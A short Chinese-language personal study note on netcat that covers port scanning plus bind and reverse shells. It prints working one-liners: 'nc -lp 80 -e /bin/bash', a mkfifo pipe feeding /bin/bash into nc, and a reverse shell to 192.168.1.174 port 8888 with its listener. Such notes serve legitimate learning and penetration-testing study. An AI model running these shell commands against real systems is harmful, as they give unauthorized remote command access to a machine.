20201014-netcat学习记录

// netcat 网络喵 一只强大的网络喵

利用nc进行端口扫描:

1

nc -vz ip prot

#v 显示 多点信息
#z 不发送数据
#r 随机指定端口与远程主机通信
#w3 设置超时3s(等待连线时间)
#多端口扫描使用 1-65535

不同版本的其他用法:

1

nc -w 3 ip port < /dev/null && echo "ok"

利用nc弹shell

被控制机:nc -lp 80 -e /bin/bash
控制机:nc <被控制机ip> <被控制机port>
#l 持续监听
#p 制定本机通信端口
#e 连接建立的时候执行一个程序

其他版本的使用方式(利用管道符):

1
2

mkfifo /tmp/f
cat /tmp/f  | /bin/bash 2>&1 | nc -l -p 80 > /tmp/f

#mkfifo 制作FIFO专用文件（命名管道）
#cat 喵

反弹shell:
看懂了 上面反弹shell就和弹shell基本上都是异曲同工
被控制端的几种使用方法:
1: cat /tmp/www | /bin/bash 2>&1 | nc 192.168.1.174 8888 > /tmp/www
2: nc 192.168.1.174 8888
控制段的使用方法:
nc -lvvp 8888

其他:

关于文件传输下次再补上吧

参考资料:
https://zhuanlan.zhihu.com/p/83959309
https://linux.die.net/man/3/mkfifo
https://linux.die.net/man/7/fifo
https://www.jianshu.com/p/5b73a607e2ea